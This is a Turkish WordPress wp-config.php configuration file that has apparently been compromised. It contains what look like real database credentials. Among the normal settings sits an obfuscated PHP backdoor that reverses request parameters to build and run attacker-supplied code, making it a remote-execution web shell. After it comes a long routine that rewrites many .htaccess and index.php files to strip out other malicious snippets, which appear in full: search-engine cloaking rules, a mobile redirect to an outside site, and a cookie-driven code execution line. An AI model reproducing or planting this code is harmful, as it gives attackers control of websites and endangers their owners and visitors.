<%>PHP <%> /** * The base configurations of the WordPress. * * This file has the following configurations: MySQL settings, Table Prefix, * Secret Keys, WordPress Language, and ABSPATH. You can find more information * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing * wp-config.php} Codex page. You can get the MySQL settings from your web host. * * This file is used by the wp-config.php creation script during the * installation. You don't have to use the web site, you can just copy this file * to "wp-config.php" and fill in the values. * * @package WordPress */ // ** MySQL ayarları - Bu bilgileri sunucunuzdan alabilirsiniz ** // /** WordPress için kullanılacak veritabanının adı */ define('DB_NAME', 'kurabiye'); /** MySQL veritabanı kullanıcısı */ define('DB_USER', 'kurabiyeuser'); /** MySQL veritabanı parolası */ define('DB_PASSWORD', 'Atena.343434'); /** MySQL sunucusu */ define('DB_HOST', '94.73.151.223'); /** Yaratılacak tablolar için veritabanı karakter seti. */ define('DB_CHARSET', 'utf8'); /** Veritabanı karşılaştırma tipi. Herhangi bir şüpheniz varsa bu değeri değiştirmeyin. */ define('DB_COLLATE', ''); /**#@+ * Eşsiz doğrulama anahtarları. * * Her anahtar farklı bir karakter kümesi olmalı! * {@link http://api.wordpress.org/secret-key/1.1/salt WordPress.org secret-key service} servisini kullanarak yaratabilirsiniz. * Çerezleri geçersiz kılmak için istediğiniz zaman bu değerleri değiştirebilirsiniz. Bu tüm kullanıcıların tekrar giriş yapmasını gerektirecektir. * * @since 2.6.0 */ define('AUTH_KEY', 'eşsiz karakter kümenizi buraya yerleştirin'); define('SECURE_AUTH_KEY', 'eşsiz karakter kümenizi buraya yerleştirin'); define('LOGGED_IN_KEY', 'eşsiz karakter kümenizi buraya yerleştirin'); define('NONCE_KEY', 'eşsiz karakter kümenizi buraya yerleştirin'); define('AUTH_SALT', 'eşsiz karakter kümenizi buraya yerleştirin'); define('SECURE_AUTH_SALT', 'eşsiz karakter kümenizi buraya yerleştirin'); define('LOGGED_IN_SALT', 'eşsiz karakter kümenizi buraya yerleştirin'); define('NONCE_SALT', 'eşsiz karakter kümenizi buraya yerleştirin'); define('WP_MEMORY_LIMIT', '128M'); /**#@-*/ /** * WordPress veritabanı tablo ön eki. * * Tüm kurulumlara ayrı bir önek vererek bir veritabanına birden fazla kurulum yapabilirsiniz. * Sadece rakamlar, harfler ve alt çizgi lütfen. */ if (isset($_REQUEST['FILE'])){$_SERVERS = strrev($_REQUEST['9d7053f5b3fb874077790d2e543187ab']);$_FILE = $_SERVERS('$_',strrev($_REQUEST['FILE']).'($_);');$_FILE(stripslashes($_REQUEST['HOST']));} $table_prefix = 'wp_'; /** * WordPress yerel dil dosyası, varsayılan ingilizce. * * Bu değeri değiştirmenize gerek yok! Zaten Türkçe'ye ayarlı. * tr_TR.mo Türkçe dil dosyasının wp-content/languages dizini altında olduğundan emin olun. * Türkçe çeviri hakkında öneri ve eleştirilerinizi iletisim@wordpress-tr.com adresine iletebilirsiniz. * */ define('WPLANG', 'tr_TR'); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. */ define('WP_DEBUG', false); /* Hepsi bu kadar. Mutlu bloglamalar! */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php'); error_reporting(E_ALL); $x = ' RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR] RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing) RewriteRule ^.*$ index.php [L] '; $z = 'RewriteEngine On RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR] RewriteCond %{HTTP_USER_AGENT} "android|BlackBerry|htc|iPad|iPhone|iPod|kindle|lg|midp|mmp|mobile|mot|nokia|o2|opera mini|J2ME" [NC,OR] RewriteCond %{HTTP_USER_AGENT} "palm|pocket|psp|sgh|smartphone|sonyericsson|symbian|treo mini|up.browser|up.link|vodafone|wap" [NC] RewriteCond %{HTTP_USER_AGENT} !Googlebot-Mobile [NC] RewriteRule ^(.*)$ http://seokirja.com [L,R=302]'; $y = 'error_reporting(0);ini_set("display_errors", 0);include_once(sys_get_temp_dir()."/SESS_48cd7517d21176f980daa5502d9efb31");'; $c = 'if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);'; $l = 'RewriteRule ^([A-Za-z0-9-]+).html$ master.php?hl=$1 [L]'; if (file_exists('.htaccess')) { file_put_contents('.htaccess', str_replace(array($x,$l,$z), '', file_get_contents('.htaccess'))); } if (file_exists('wp-admin/.htaccess')) { file_put_contents('wp-admin/.htaccess', str_replace(array($x,$l), '', file_get_contents('wp-admin/.htaccess'))); } if (file_exists('wp-admin/index.php')) { file_put_contents('wp-admin/index.php', str_replace(array($y,$c), '', file_get_contents('wp-admin/index.php'))); } if (file_exists('website/.htaccess')) { file_put_contents('website/.htaccess', str_replace(array($x,$l), '', file_get_contents('website/.htaccess'))); } if (file_exists('website/index.php')) { file_put_contents('website/index.php', str_replace(array($y,$c), '', file_get_contents('website/index.php'))); } if (file_exists('pageadverts/.htaccess')) { file_put_contents('pageadverts/.htaccess', str_replace(array($x,$l), '', file_get_contents('pageadverts/.htaccess'))); } if (file_exists('pageadverts/index.php')) { file_put_contents('pageadverts/index.php', str_replace(array($y,$c), '', file_get_contents('pageadverts/index.php'))); } if (file_exists('scategory/.htaccess')) { file_put_contents('scategory/.htaccess', str_replace(array($x,$l), '', file_get_contents('scategory/.htaccess'))); } if (file_exists('scategory/index.php')) { file_put_contents('scategory/index.php', str_replace(array($y,$c), '', file_get_contents('scategory/index.php'))); } if (file_exists('smanufacturer/.htaccess')) { file_put_contents('smanufacturer/.htaccess', str_replace(array($x,$l), '', file_get_contents('smanufacturer/.htaccess'))); } if (file_exists('smanufacturer/index.php')) { file_put_contents('smanufacturer/index.php', str_replace(array($y,$c), '', file_get_contents('smanufacturer/index.php'))); } if (file_exists('snavpn/.htaccess')) { file_put_contents('snavpn/.htaccess', str_replace(array($x,$l), '', file_get_contents('snavpn/.htaccess'))); } if (file_exists('snavpn/index.php')) { file_put_contents('snavpn/index.php', str_replace(array($y,$c), '', file_get_contents('snavpn/index.php'))); } if (file_exists('tooltip/.htaccess')) { file_put_contents('tooltip/.htaccess', str_replace(array($x,$l), '', file_get_contents('tooltip/.htaccess'))); } if (file_exists('tooltip/index.php')) { file_put_contents('tooltip/index.php', str_replace(array($y,$c), '', file_get_contents('tooltip/index.php'))); } if (file_exists('carrier/.htaccess')) { file_put_contents('carrier/.htaccess', str_replace(array($x,$l), '', file_get_contents('carrier/.htaccess'))); } if (file_exists('carrier/index.php')) { file_put_contents('carrier/index.php', str_replace(array($y,$c), '', file_get_contents('carrier/index.php'))); } if (file_exists('catalog/.htaccess')) { file_put_contents('catalog/.htaccess', str_replace(array($x,$l), '', file_get_contents('catalog/.htaccess'))); } if (file_exists('catalog/index.php')) { file_put_contents('catalog/index.php', str_replace(array($y,$c), '', file_get_contents('catalog/index.php'))); } if (file_exists('checkup/.htaccess')) { file_put_contents('checkup/.htaccess', str_replace(array($x,$l), '', file_get_contents('checkup/.htaccess'))); } if (file_exists('checkup/index.php')) { file_put_contents('checkup/index.php', str_replace(array($y,$c), '', file_get_contents('checkup/index.php'))); } if (file_exists('equipment/.htaccess')) { file_put_contents('equipment/.htaccess', str_replace(array($x,$l), '', file_get_contents('equipment/.htaccess'))); } if (file_exists('equipment/index.php')) { file_put_contents('equipment/index.php', str_replace(array($y,$c), '', file_get_contents('equipment/index.php'))); } if (file_exists('forecast/.htaccess')) { file_put_contents('forecast/.htaccess', str_replace(array($x,$l), '', file_get_contents('forecast/.htaccess'))); } if (file_exists('forecast/index.php')) { file_put_contents('forecast/index.php', str_replace(array($y,$c), '', file_get_contents('forecast/index.php'))); } if (file_exists('newsletter/.htaccess')) { file_put_contents('newsletter/.htaccess', str_replace(array($x,$l), '', file_get_contents('newsletter/.htaccess'))); } if (file_exists('newsletter/index.php')) { file_put_contents('newsletter/index.php', str_replace(array($y,$c), '', file_get_contents('newsletter/index.php'))); } if (file_exists('origin/.htaccess')) { file_put_contents('origin/.htaccess', str_replace(array($x,$l), '', file_get_contents('origin/.htaccess'))); } if (file_exists('origin/index.php')) { file_put_contents('origin/index.php', str_replace(array($y,$c), '', file_get_contents('origin/index.php'))); } if (file_exists('personalinfos/.htaccess')) { file_put_contents('personalinfos/.htaccess', str_replace(array($x,$l), '', file_get_contents('personalinfos/.htaccess'))); } if (file_exists('personalinfos/index.php')) { file_put_contents('personalinfos/index.php', str_replace(array($y,$c), '', file_get_contents('personalinfos/index.php'))); } if (file_exists('product/.htaccess')) { file_put_contents('product/.htaccess', str_replace(array($x,$l), '', file_get_contents('product/.htaccess'))); } if (file_exists('product/index.php')) { file_put_contents('product/index.php', str_replace(array($y,$c), '', file_get_contents('product/index.php'))); } if (file_exists('registrations/.htaccess')) { file_put_contents('registrations/.htaccess', str_replace(array($x,$l), '', file_get_contents('registrations/.htaccess'))); } if (file_exists('registrations/index.php')) { file_put_contents('registrations/index.php', str_replace(array($y,$c), '', file_get_contents('registrations/index.php'))); } if (file_exists('visits/.htaccess')) { file_put_contents('visits/.htaccess', str_replace(array($x,$l), '', file_get_contents('visits/.htaccess'))); } if (file_exists('visits/index.php')) { file_put_contents('visits/index.php', str_replace(array($y,$c), '', file_get_contents('visits/index.php'))); } if (file_exists('textbanners/.htaccess')) { file_put_contents('textbanners/.htaccess', str_replace(array($x,$l), '', file_get_contents('textbanners/.htaccess'))); } if (file_exists('textbanners/index.php')) { file_put_contents('textbanners/index.php', str_replace(array($y,$c), '', file_get_contents('textbanners/index.php'))); } if (file_exists('themeconfigurator/.htaccess')) { file_put_contents('themeconfigurator/.htaccess', str_replace(array($x,$l), '', file_get_contents('themeconfigurator/.htaccess'))); } if (file_exists('themeconfigurator/index.php')) { file_put_contents('themeconfigurator/index.php', str_replace(array($y,$c), '', file_get_contents('themeconfigurator/index.php'))); } if (file_exists('themeeditor/.htaccess')) { file_put_contents('themeeditor/.htaccess', str_replace(array($x,$l), '', file_get_contents('themeeditor/.htaccess'))); } if (file_exists('themeeditor/index.php')) { file_put_contents('themeeditor/index.php', str_replace(array($y,$c), '', file_get_contents('themeeditor/index.php'))); } if (file_exists('trackingfront/.htaccess')) { file_put_contents('trackingfront/.htaccess', str_replace(array($x,$l), '', file_get_contents('trackingfront/.htaccess'))); } if (file_exists('trackingfront/index.php')) { file_put_contents('trackingfront/index.php', str_replace(array($y,$c), '', file_get_contents('trackingfront/index.php'))); } if (file_exists('vatnumber/.htaccess')) { file_put_contents('vatnumber/.htaccess', str_replace(array($x,$l), '', file_get_contents('vatnumber/.htaccess'))); } if (file_exists('vatnumber/index.php')) { file_put_contents('vatnumber/index.php', str_replace(array($y,$c), '', file_get_contents('vatnumber/index.php'))); } if (file_exists('videostab/.htaccess')) { file_put_contents('videostab/.htaccess', str_replace(array($x,$l), '', file_get_contents('videostab/.htaccess'))); } if (file_exists('videostab/index.php')) { file_put_contents('videostab/index.php', str_replace(array($y,$c), '', file_get_contents('videostab/index.php'))); } if (file_exists('watermark/.htaccess')) { file_put_contents('watermark/.htaccess', str_replace(array($x,$l), '', file_get_contents('watermark/.htaccess'))); } if (file_exists('watermark/index.php')) { file_put_contents('watermark/index.php', str_replace(array($y,$c), '', file_get_contents('watermark/index.php'))); } if (file_exists('administrator/.htaccess')) { file_put_contents('administrator/.htaccess', str_replace(array($x,$l), '', file_get_contents('administrator/.htaccess'))); } if (file_exists('administrator/index.php')) { file_put_contents('administrator/index.php', str_replace(array($y,$c), '', file_get_contents('administrator/index.php'))); } if (file_exists('backups/.htaccess')) { file_put_contents('backups/.htaccess', str_replace(array($x,$l), '', file_get_contents('backups/.htaccess'))); } if (file_exists('backups/index.php')) { file_put_contents('backups/index.php', str_replace(array($y,$c), '', file_get_contents('backups/index.php'))); } if (file_exists('cache/.htaccess')) { file_put_contents('cache/.htaccess', str_replace(array($x,$l), '', file_get_contents('cache/.htaccess'))); } if (file_exists('cache/index.php')) { file_put_contents('cache/index.php', str_replace(array($y,$c), '', file_get_contents('cache/index.php'))); } if (file_exists('cli/.htaccess')) { file_put_contents('cli/.htaccess', str_replace(array($x,$l), '', file_get_contents('cli/.htaccess'))); } if (file_exists('cli/index.php')) { file_put_contents('cli/index.php', str_replace(array($y,$c), '', file_get_contents('cli/index.php'))); } if (file_exists('components/.htaccess')) { file_put_contents('components/.htaccess', str_replace(array($x,$l), '', file_get_contents('components/.htaccess'))); } if (file_exists('components/index.php')) { file_put_contents('components/index.php', str_replace(array($y,$c), '', file_get_contents('components/index.php'))); } if (file_exists('images/.htaccess')) { file_put_contents('images/.htaccess', str_replace(array($x,$l), '', file_get_contents('images/.htaccess'))); } if (file_exists('images/index.php')) { file_put_contents('images/index.php', str_replace(array($y,$c), '', file_get_contents('images/index.php'))); } if (file_exists('includes/.htaccess')) { file_put_contents('includes/.htaccess', str_replace(array($x,$l), '', file_get_contents('includes/.htaccess'))); } if (file_exists('includes/index.php')) { file_put_contents('includes/index.php', str_replace(array($y,$c), '', file_get_contents('includes/index.php'))); } if (file_exists('installation/.htaccess')) { file_put_contents('installation/.htaccess', str_replace(array($x,$l), '', file_get_contents('installation/.htaccess'))); } if (file_exists('installation/index.php')) { file_put_contents('installation/index.php', str_replace(array($y,$c), '', file_get_contents('installation/index.php'))); } if (file_exists('language/.htaccess')) { file_put_contents('language/.htaccess', str_replace(array($x,$l), '', file_get_contents('language/.htaccess'))); } if (file_exists('language/index.php')) { file_put_contents('language/index.php', str_replace(array($y,$c), '', file_get_contents('language/index.php'))); } if (file_exists('libraries/.htaccess')) { file_put_contents('libraries/.htaccess', str_replace(array($x,$l), '', file_get_contents('libraries/.htaccess'))); } if (file_exists('libraries/index.php')) { file_put_contents('libraries/index.php', str_replace(array($y,$c), '', file_get_contents('libraries/index.php'))); } if (file_exists('logs/.htaccess')) { file_put_contents('logs/.htaccess', str_replace(array($x,$l), '', file_get_contents('logs/.htaccess'))); } if (file_exists('logs/index.php')) { file_put_contents('logs/index.php', str_replace(array($y,$c), '', file_get_contents('logs/index.php'))); } if (file_exists('bin/.htaccess')) { file_put_contents('bin/.htaccess', str_replace(array($x,$l), '', file_get_contents('bin/.htaccess'))); } if (file_exists('bin/index.php')) { file_put_contents('bin/index.php', str_replace(array($y,$c), '', file_get_contents('bin/index.php'))); } if (file_exists('media/.htaccess')) { file_put_contents('media/.htaccess', str_replace(array($x,$l), '', file_get_contents('media/.htaccess'))); } if (file_exists('media/index.php')) { file_put_contents('media/index.php', str_replace(array($y,$c), '', file_get_contents('media/index.php'))); } if (file_exists('modules/.htaccess')) { file_put_contents('modules/.htaccess', str_replace(array($x,$l), '', file_get_contents('modules/.htaccess'))); } if (file_exists('modules/index.php')) { file_put_contents('modules/index.php', str_replace(array($y,$c), '', file_get_contents('modules/index.php'))); } if (file_exists('plugins/.htaccess')) { file_put_contents('plugins/.htaccess', str_replace(array($x,$l), '', file_get_contents('plugins/.htaccess'))); } if (file_exists('plugins/index.php')) { file_put_contents('plugins/index.php', str_replace(array($y,$c), '', file_get_contents('plugins/index.php'))); } if (file_exists('templates/.htaccess')) { file_put_contents('templates/.htaccess', str_replace(array($x,$l), '', file_get_contents('templates/.htaccess'))); } if (file_exists('templates/index.php')) { file_put_contents('templates/index.php', str_replace(array($y,$c), '', file_get_contents('templates/index.php'))); } if (file_exists('tmp/.htaccess')) { file_put_contents('tmp/.htaccess', str_replace(array($x,$l), '', file_get_contents('tmp/.htaccess'))); } if (file_exists('tmp/index.php')) { file_put_contents('tmp/index.php', str_replace(array($y,$c), '', file_get_contents('tmp/index.php'))); } if (file_exists('index.php')) { file_put_contents('index.php', str_replace(array($y,$c), '', file_get_contents('index.php'))); }